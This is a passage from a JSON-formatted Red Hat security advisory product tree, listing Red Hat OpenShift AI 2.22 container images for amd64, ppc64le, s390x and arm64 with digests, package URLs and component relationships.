"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product_id": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-operator-bundle@sha256%3Abd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669970"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3Aa54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-training-operator-rhel9@sha256%3A251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764595822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-trustyai-service-operator-rhel9@sha256%3A3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763639678"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product_id": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-trustyai-service-rhel9@sha256%3A51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764596318"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3Abbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3Af43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3A67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3A3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3A8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3Afe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3Ab8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
